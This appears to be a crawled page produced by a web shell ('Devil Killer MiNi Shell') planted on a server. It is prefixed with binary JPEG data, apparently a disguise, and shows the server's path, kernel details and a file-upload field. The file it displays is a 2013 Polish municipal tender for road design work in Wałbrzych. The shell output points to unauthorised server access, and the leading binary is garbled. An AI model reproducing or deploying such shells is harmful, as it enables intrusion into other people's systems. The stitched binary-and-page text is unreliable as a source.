JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130711/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130711/271854-N-2013.html

<p class="kh_header"><b>Wałbrzych: Przygotowanie dokumentacji wielobranżowej dla budowy ul. Długosza oraz przebudowy ul. Porcelanowej i Gen. Grota - Roweckiego w Wałbrzychu</b><br>
<b>Numer ogłoszenia: 271854 - 2013; data zamieszczenia: 11.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wałbrzych - Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu , ul. Matejki 1, 58-300 Wałbrzych, woj. dolnośląskie, tel. 74 6414400, 6414408, faks 74 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdkium.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie dokumentacji wielobranżowej dla budowy ul. Długosza oraz przebudowy ul. Porcelanowej i Gen. Grota - Roweckiego w Wałbrzychu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przygotowanie dokumentacji wielobranżowej dla budowy ul. Długosza oraz przebudowy ul. Porcelanowej i ul. Gen. Grota - Roweckiego w Wałbrzychu
W ramach zamówienia należy opracować:
Ulica gen. Grota-Roweckiego:
1.	Wniosek zgłoszenia wykonania robót budowlanych, wraz z projektem budowlanym obejmującym:
1) projekt zagospodarowania terenu,
2) projekty architektoniczno-budowlane dla branży:
- drogowej,
- sanitarnej,
- elektrycznej,
2.	Projekty wykonawcze obejmujące:
- projekt dróg, miejsc postojowych, chodników i ciągów pieszych,
- projekt odwodnienia projektowanych powierzchni utwardzonych jezdni, miejsc postojowych, chodników oraz ciągów pieszych,
- projekt oświetlenia drogowego,
- projekt kanałów technologicznych,
- inwentaryzacje zieleni wraz z wycinką drzew (w razie potrzeby),
- projekt docelowej organizacji ruchu,
- projekty zabezpieczenia lub ewentualnej przebudowy urządzeń nadziemnych i podziemnych (tj. kanalizacji sanitarnej, sieci energetycznej, gazowej, teletechnicznej lub innych) wynikających z kolizji i warunków gestorów urządzeń, które zostaną zaakceptowane przez Zamawiającego. W projektach przebudowy kolizyjnych sieci i urządzeń winny być zachowane dotychczasowe właściwości użytkowe i parametry techniczne.
3.	Przedmiary robót wraz z scalonym formularzem ofertowym, 
4.	Kosztorys ofertowy,
5.	Kosztorysy inwestorskie,
6.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych,
7.	Wytyczne do sporządzenia planu BIOZ,
8.	Dokumentację geotechniczną określającą warunki gruntowo-wodne podłoża, poprzedzone badaniami geotechnicznymi, w zakresie niezbędnym do prawidłowego zaprojektowania inwestycji, 
9.	Aktualną mapę sytuacyjno-wysokościową do celów projektowych w skali 1:500.

Ulica Porcelanowa:
1.	Wniosek o wydanie decyzji pozwolenia na budowę, wraz z projektem budowlanym obejmującym:
1) projekt zagospodarowania terenu,
2) projekty architektoniczno-budowlane dla branży:
- drogowej,
- sanitarnej,
- elektrycznej,
2.	Projekty wykonawcze obejmujące:
- projekt dróg, miejsc postojowych, chodników i ciągów pieszych,
- projekt odwodnienia projektowanych powierzchni utwardzonych jezdni, miejsc postojowych, chodników oraz ciągów pieszych,
- projekt oświetlenia drogowego,
- projekt kanałów technologicznych,
- inwentaryzacje zieleni wraz z wycinką drzew (w razie potrzeby),
- projekt docelowej organizacji ruchu,
- projekty zabezpieczenia lub ewentualnej przebudowy urządzeń nadziemnych i podziemnych (tj. kanalizacji sanitarnej, sieci energetycznej, gazowej, teletechnicznej lub innych) wynikających z kolizji i warunków gestorów urządzeń, które zostaną zaakceptowane przez Zamawiającego. W projektach przebudowy kolizyjnych sieci i urządzeń winny być zachowane dotychczasowe właściwości użytkowe i parametry techniczne.
3.	Przedmiary robót wraz z scalonym formularzem ofertowym, 
4.	Kosztorys ofertowy,
5.	Kosztorysy inwestorskie,
6.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych,
7.	Wytyczne do sporządzenia planu BIOZ,
8.	Dokumentację geotechniczną określającą warunki gruntowo-wodne podłoża, poprzedzone badaniami geotechnicznymi, w zakresie niezbędnym do prawidłowego zaprojektowania inwestycji, 
9.	Aktualną mapę sytuacyjno-wysokościową do celów projektowych w skali 1:500.


Ulica Długosza:
1.	Wniosek o wydanie decyzji zgody na realizację inwestycji drogowej (zgodny z ustawą z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - Dz.U.2003.80.721 z późniejszymi zmianami), wraz z projektem budowlanym obejmującym:
1) projekt zagospodarowania terenu,
2) projekty architektoniczno-budowlane dla branży:
- drogowej,
- sanitarnej,
- elektrycznej,
3) mapy zawierające projekty podziału nieruchomości, sporządzone zgodnie z odrębnymi przepisami,
2.	Projekty wykonawcze obejmujące:
- projekt dróg, miejsc postojowych, chodników i ciągów pieszych,
- projekt odwodnienia projektowanych powierzchni utwardzonych jezdni, miejsc postojowych, chodników oraz ciągów pieszych,
- projekt oświetlenia drogowego,
- projekt kanałów technologicznych,
- inwentaryzacje zieleni wraz z wycinką drzew (w razie potrzeby),
- projekt docelowej organizacji ruchu,
- projekty zabezpieczenia lub ewentualnej przebudowy urządzeń nadziemnych i podziemnych (tj. kanalizacji sanitarnej, sieci energetycznej, gazowej, teletechnicznej lub innych) wynikających z kolizji i warunków gestorów urządzeń, które zostaną zaakceptowane przez Zamawiającego. W projektach przebudowy kolizyjnych sieci i urządzeń winny być zachowane dotychczasowe właściwości użytkowe i parametry techniczne.
3.	Przedmiary robót wraz z scalonym formularzem ofertowym, 
4.	Kosztorys ofertowy,
5.	Kosztorysy inwestorskie,
6.	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych,
7.	Wytyczne do sporządzenia planu BIOZ,
8.	Dokumentację geotechniczną określającą warunki gruntowo-wodne podłoża, poprzedzone badaniami geotechnicznymi, w zakresie niezbędnym do prawidłowego zaprojektowania inwestycji, 
9.	Aktualną mapę sytuacyjno-wysokościową do celów projektowych w skali 1:500.

Wymagania dodatkowe dotyczące zamówienia:
1. Dokumentacja musi posiadać wszystkie niezbędne uzgodnienia, pozwolenia, decyzje i opinie niezbędne do uzyskania: decyzji zgody na realizację inwestycji drogowej dla ulicy Długosza, pozwolenia na budowę dla ulicy Porcelanowej oraz zgłoszenia robót budowlanych - dla ulicy gen. Grota-Roweckiego,
2. Wykonawca zobowiązany jest do uzyskania warunków technicznych od gestorów sieci nie związanych z funkcją drogi, a znajdujących się w granicach opracowania projektowego (o ile takie wystąpią),
3. Szczegółowy zakres prac projektowych będzie wynikał z uzyskanych przez projektanta warunków technicznych oraz uzgodnień dokonywanych w trakcie projektowania,
4. W przypadku jeśli będzie to konieczne, do Wykonawcy należeć będzie przeprowadzenie podziałów nieruchomości, zgodnie z projektem podziału - dla ulicy Długosza,
5. Wykonawca sporządzi kartę informacyjną przedsięwzięcia i uzyska decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, w tym w razie takiej potrzeby sporządzi także raport oddziaływania inwestycji na środowisko,
6. Wykonawca sporządzi operat wodnoprawny i uzyska pozwolenie wodnoprawne na wykonanie wylotów kanalizacyjnych i szczególne korzystanie z wód w zakresie odprowadzenia ścieków opadowych z powierzchni pasa drogowego do wód - dla ulicy Długosza i Porcelanowej,
7. Wykonawca pozyska aktualne wypisy z rejestru gruntów oraz mapy ewidencji gruntów i sporządzi wykaz działek zajmowanych pod inwestycję wraz z naniesiona na mapy obrębowe linią rozgraniczenia ulicy - zajęcia stałe oraz zajęcia tymczasowe (na czas prowadzenia robót i pod zaplecze budowy, przy czym należy dążyć by zajęcia te lokalizować na działkach Gminy Wałbrzych) - dla ulicy Długosza,
8. Wykonawca sporządzi kolorową planszę zbiorczą uzbrojenia istniejącego i projektowanego,
9. Wykonawca zobowiązany jest czynnie uczestniczyć w procesie uzyskiwania wszystkich opinii, uzgodnień i decyzji związanych z przedmiotem zamówienia,
10. Przynajmniej 1 raz w miesiącu, Wykonawca będzie brał udział w naradach koordynacyjnych, na których ustalane będą bieżące wytyczne do projektu, oraz przedstawiony zostanie stopień zaawansowania prac projektowych. Narady będą się odbywały w siedzibie Zamawiającego w terminach z nim uzgodnionych,
11. Wszelkie istotne informacje, mające bezpośredni wpływ na termin i jakość realizacji przedmiotu zamówienia, Wykonawca będzie przekazywał niezwłocznie Zamawiającemu za pomocą ogólnie przyjętych metod (przesyłka listowa, fax, e-mail)
2. Szczegółowy zakres opracowań projektowych

Rozwiązania branży drogowej

W ramach opracowanej dokumentacji projektowanej należy przewidzieć:
1. remont ulicy gen. Grota-Roweckiego (droga klasy L) na długości ok. 280m, od skrzyżowania z ul. Wyszyńskiego (bez przebudowy skrzyżowania) do skrzyżowania z ul. Wrocławską (bez przebudowy skrzyżowania) 
Projekt winien obejmować wykonanie:
1) jezdni bitumicznej o konstrukcji dostosowanej do KR3, obramowanej krawężnikami betonowymi,
2) przebudowy skrzyżowania ul. gen. Grota-Roweckiego z ul. Porcelanową
3) chodników z nawierzchnią z kostki betonowej gr. 8 cm (nawiązać do chodnika ul. Wyszyńskiego) i konstrukcją dostosowaną do KR1,
4) zjazdów z ul. gen. Grota-Roweckiego umożliwiających dojazd do przyległych posesji,
5) rozwiązań nie stwarzających barier architektonicznych, szczególnie w obszarze przejść dla pieszych, z jednoczesnym stosowaniem elementów ułatwiających poruszanie się osobom niewidomym i słabo widzącym.

2. przebudowę ulicy Porcelanowej (droga klasy D) na długości ok. 200m, od skrzyżowania z ul. gen. Grota-Roweckiego (przebudowa skrzyżowania w opracowaniu ul. gen. Grota-Roweckiego) do skrzyżowania z ul. Długosza (bez przebudowy skrzyżowania) 
Projekt winien obejmować wykonanie:
1) jezdni bitumicznej o konstrukcji dostosowanej do KR2, obramowanej krawężnikami betonowymi,
2) chodników z nawierzchnią z kostki betonowej gr. 8 cm (nawierzchnia analogiczna do przyjętej w opracowaniu ul. gen. Grota-Roweckiego) i konstrukcją dostosowaną do KR1,
3) zjazdów z ul. Porcelanowej umożliwiających dojazd do przyległych posesji,
4) rozwiązań nie stwarzających barier architektonicznych, szczególnie w obszarze przejść dla pieszych, z jednoczesnym stosowaniem elementów ułatwiających poruszanie się osobom niewidomym i słabo widzącym.

3. przebudowę oraz budowę dalszej części ulicy Długosza (droga klasy D) na długości ok. 300m, od skrzyżowania z ul. Wrocławską (bez przebudowy skrzyżowania) do skrzyżowania z ul. Porcelanową (wraz z  przebudową skrzyżowania) oraz budową ciągu pieszego na odcinku od skrzyżowania z ul. Porcelanową do skrzyżowania z ul. Wyszyńskiego.
Projekt winien obejmować wykonanie:
1) jezdni bitumicznej o konstrukcji dostosowanej do KR2, obramowanej krawężnikami betonowymi,
2) chodników z nawierzchnią z kostki betonowej gr. 8 cm (nawierzchnia analogiczna do przyjętej w opracowaniu ul. gen. Grota-Roweckiego i Porcelanowej) i konstrukcją dostosowaną do KR1,
3) ciągu pieszego z regulacją wód opadowych z nawierzchnią z kostki betonowej gr. 8 cm oraz elementami małej architektury uniemożliwiającymi wjazd samochodów,
4) murów oporowych,
5) zjazdów z ul. Długosza umożliwiających dojazd do przyległych posesji,
6) rozwiązań nie stwarzających barier architektonicznych, szczególnie w obszarze przejść dla pieszych, z jednoczesnym stosowaniem elementów ułatwiających poruszanie się osobom niewidomym i słabo widzącym.

Rozwiązania branży sanitarnej - odwodnienie pasa drogowego

Zaprojektować budowę nowej kanalizacji deszczowej na ulicy Porcelanowej i Długosza oraz remont kanalizacji deszczowej ulicy gen. Grota-Roweckiego (wraz ze wszystkimi przyłączami do budynków do granic pasa drogowego), uwzględniającą przyszłe zagospodarowanie przyległego terenu. Studzienki wpustów wyposażyć w osadniki, natomiast kratki ściekowe powinny posiadać zabezpieczenie przed kradzieżą. Wszystkie studnie rewizyjne na istniejącej kanalizacji sanitarnej przewidzieć do przebudowy z dostosowaniem do projektowanej niwelety drogi lub innych nawierzchni utwardzonych. Studnie zlokalizowane w obszarze jezdni wyposażyć w pierścienie i płyty odciążające. Wszystkie włazy do studni rewizyjnych wykonać jako żeliwne z wypełnieniem betonowym. W ramach opracowania należy również rozwiązać odwodnienie terenów przyległych w zakresie spływu wód w kierunku pasa drogowego przedmiotowych ulic. 

Rozwiązania branży elektrycznej - oświetlenie uliczne

W ciągu  projektowanej ulicy Długosza, Porcelanowej i gen. Grota-Roweckiego należy przewidzieć demontaż i utylizację istniejącego oświetlenia ulicznego będącego własnością Grupy TAURON. Uzyskanie stosownej zgody, podpisanie porozumienia oraz wykup majątku od właściciela leży po stronie ZDKiUM. Oświetlenie uliczne zaprojektować jako wydzielone, zasilane z nowej szafki oświetleniowej dla której należy uzyskać techniczne warunki przyłączenia. Szafkę oświetleniową wyposażyć w zegar astronomiczny.
Linię wykonać na słupach stalowych ocynkowanych, wkopywanych, wyposażonych w opaskę antykorozyjną, przy czym słupy winny spełniać wymogi III strefy wiatrowej. Wysokość słupów dostosować do wymogów technicznych i norm oraz warunków lokalnych. Zastosować oprawy sodowe energooszczędne, ze szczelną komorą optyczną.
Wszystkie przejścia dla pieszych wyposażyć w doświetlacze asymetryczne zabudowane na niezależnych słupach.
W ramach projektowanego oświetlenia ulicznego należy zapewnić dalsze funkcjonowanie oświetlenia istniejącego na odcinkach nie podlegających przebudowie, a w szczególności w sytuacji kiedy korzysta ono z tych samych obwodów co oświetlenie demontowane.

Kanały technologiczne

W ciągu  projektowanych ulic należy zaprojektować kanały technologiczne, spełniające wymogi ustaw:
- z dnia 21 marca 1985 roku o drogach publicznych (Dz.U.2007.19.115 tekst jednolity z późniejszymi zmianami)
- z dnia 7 maja 2010 roku o wspieraniu rozwoju usług i sieci telekomunikacyjnych (Dz.U.2010.106.675 z późniejszymi zmianami),
oraz warunków technicznych, które zostaną wydane przez ZDKiUM na wniosek Wykonawcy.

3. Wymagania dotyczące dokumentacji

1. Dokumentację dla każdego z zadań należy opracować w sposób umożliwiający realizację robót budowlanych oddzielnie dla każdej z ulic.
2. Przedmiot zamówienia należy opracować w szczególności zgodnie z:
- ustawą z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - Dz.U.2003.80.721 z późniejszymi zmianami),
- ustawą z dnia 7 lipca 1994 roku - Prawo budowlane (Dz.U.2010.243.1623 tekst jednolity z późniejszymi zmianami),
- ustawą z dnia 21 marca 1985 roku o drogach publicznych (Dz.U.2013.260  tekst jednolity z późniejszymi zmianami),
- ustawą z dnia 18 lipca 2001 roku -  Prawo wodne (Dz.U.2012.145 tekst jednolity z późniejszymi zmianami),
- rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 roku w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U.199.43.430 z późniejszymi zmianami),
- rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym (Dz.U.2004.130.1389 z późniejszymi zmianami),
- rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.2004.202.2072 z późniejszymi zmianami),
- ustawą z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (Dz.U.2010.113.759 tekst jednolity z późniejszymi zmianami),
- ustawą z dnia 27 kwietnia 2001 roku - Prawo ochrony środowiska (Dz.U.2008.25.150 tekst jednolity z późniejszymi zmianami),
- ustawą z dnia 20 czerwca 1997 roku - Prawo o ruchu drogowym (Dz.U.2012.1137 tekst jednolity z późniejszymi zmianami),
- ustawą z dnia 7 maja 2010 roku o wspieraniu rozwoju usług i sieci telekomunikacyjnych (Dz.U.2010.106.675 z późniejszymi zmianami).
3. Projekt należy opracować na aktualnym podkładzie geodezyjnym, przy aktualnym stanie ewidencji gruntów,
4. Do projektu budowlanego należy dołączyć:
a) kopie uprawnień budowlanych projektantów i sprawdzających potwierdzone za zgodność z oryginałem,
b) kopie zaświadczeń o przynależności projektantów i sprawdzających do właściwej izby samorządu zawodowego potwierdzone za zgodność z oryginałem,
c) oświadczenia projektantów i sprawdzających o opracowaniu dokumentacji zgodnie z umową, zasadami wiedzy technicznej, obowiązującymi w tym zakresie przepisami, normami, i został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
d) wytyczne do sporządzenia informacji bezpieczeństwa i ochrony zdrowia,
5. Przy opracowaniu poszczególnych części projektu należy uwzględnić następujące zalecenia:
a) projekt wykonawczy powinien posiadać wszelkie niezbędne do realizacji zadania szczegółowe rozwiązania wynikające z przedmiotu zamówienia,
b) należy wykorzystywać w opracowanej dokumentacji projektowej najnowsze rozwiązania technologiczne,
c) projekt budowlany winien uzyskać wymagane przepisami szczegółowymi opinie i uzgodnienia,
d) dla warunków wydanych przez gestorów sieci uzyskać akceptację Zamawiającego,
e) wszelką korespondencję z instytucjami, gestorami sieci i urzędami związaną z prowadzonymi pracami projektowymi prowadzić z powiadomieniem Zamawiającego,
f) projekt winien posiadać wykaz opracowań wchodzących w skład całej dokumentacji projektowej. 
6. Dokumentację należy opracować w następującej ilości egzemplarzy dla każdej z ulic:
- (dla ulicy Długosza) wniosek o wydanie decyzji zgody na realizację inwestycji drogowej, tj.:
- mapy z liniami rozgraniczającymi i projekty podziału    - 8 egz.,
- projekt budowlany    - 6 egz.
- (dla ulicy Porcelanowej) wniosek o wydanie decyzji pozwolenia na budowę:
- kompletny wniosek o pozwolenie na budowę,
- projekt budowlany    - 6 egz.,
- (dla ulicy gen. Grota-Roweckiego) wniosek zgłoszenia wykonania robót budowlanych, w tym:
- kompletny wniosek zgłoszenia robót budowlanych
- projekt budowlany     - 6 egz.
Ponadto: 
- projekty wykonawcze (osobno dla każdej z branż i każdego zadania)    - 4 egz.,
- przedmiary robót (osobno dla każdej z branż i każdego zadania)    - 1 egz.
- kosztorys ofertowy (osobno dla każdej z branż i każdego zadania )    - 1 egz.
Formularz przedmiaru robót do wyceny należy sporządzić w układzie tabelarycznym obejmującym wyłącznie opisy robót podstawowych z podaniem numeru SST przy każdej pozycji.
W tabeli przedmiaru robót należy ująć:
- kol. 1	- liczba porządkowa,
- kol. 2	- pozycja SST,
- kol. 3	- opis robót,
- kol. 4	- jednostka,
- kol. 5	- ilość jednostek,
- kol. 6	- cena jednostkowa,
- kol. 7	- wartość netto,
- kosztorys inwestorski (osobno dla każdej z branż i każdego zadania )   - 1 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych (osobno dla każdej z branż i każdego zadania )   - 1 egz.
Szczegółowe specyfikacje techniczne dla robót drogowych winny być sporządzone na podstawie aktualnych Ogólnych Specyfikacji Technicznych wydanych przez Generalna Dyrekcję Dróg Krajowych i Autostrad.
- wersja elektroniczna dokumentacji na płycie CD (osobno dla każdego zadania)  - 2 egz.
Dopuszczalne formaty elektronicznego zapisu dokumentacji projektowej: *.doc, *.xls, *.pdf, *.jpg, *.dwg. Pliki muszą być zoptymalizowane pod względem rozmiaru. Jakość zeskanowanych lub wygenerowanych dokumentów, rysunków technicznych i zdjęć powinna umożliwić odczytanie wszystkich detali i cech oraz powinna nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Forma pisemna dokumentacji projektowej musi być tożsama z formą cyfrową.
Części opisowe projektu zostaną sporządzone za pomocą komputerowego edytora tekstów i zapisane w formacje kompatybilnym z MS Word, natomiast przedmiar robót i kosztorys ofertowy zostaną zapisane w formacie komputerowego arkusza kalkulacyjnego kompatybilnego z MS Excel. 

7. Dokumentacja musi być wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi, aktualnymi normami w kolejności stosowania zgodnie z art. 30 Prawa zamówień publicznych, wytycznymi i być kompletna z punktu widzenia celu, któremu ma służyć.
8. Dokumentacja projektowa nie może zostać opisana przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką rozwiązania i nie można go opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny.
9. Wykonawca przekaże Zamawiającemu przedmiotową dokumentacje projektowa w siedzibie Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1  pkt 6) Ustawy do wysokości 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej dwie usługi polegające na opracowaniu wielobranżowej dokumentacji projektowej w zakresie budowy lub przebudowy drogi  klasy min. L o długości minimum 400 m, obejmujące:
- sporządzenie wniosku o wydanie decyzji zgody na realizację inwestycji drogowej, 
- opracowanie  projektu budowlanego,
- opracowanie  projektów wykonawczych (drogowych i branżowych) wraz z kosztorysem inwestorskim i przedmiarem, w zakresie: dróg, kanalizacji deszczowej oraz oświetlenia drogowego,
- wykonanie  Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót.

Przez jedną usługę Zamawiający rozumie usługę wykonaną na podstawie jednej umowy lub w ramach jednego zamówienia.
W przypadku składania ofert przez Wykonawców występujących wspólnie, warunek spełnia dowolny Wykonawca. W przypadku składania oferty wspólnej, wymagane dokumenty składa ten Wykonawca, który spełnia dany warunek.
Ocena, czy Wykonawca spełnia przedstawione wyżej warunki udziału w postępowaniu, zostanie dokonana zgodnie z kryterium spełnia - nie spełnia, na podstawie analizy załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub ma możliwość dysponowania osobami zdolnymi do wykonania zamówienia, tj.
a. projektant branży drogowej
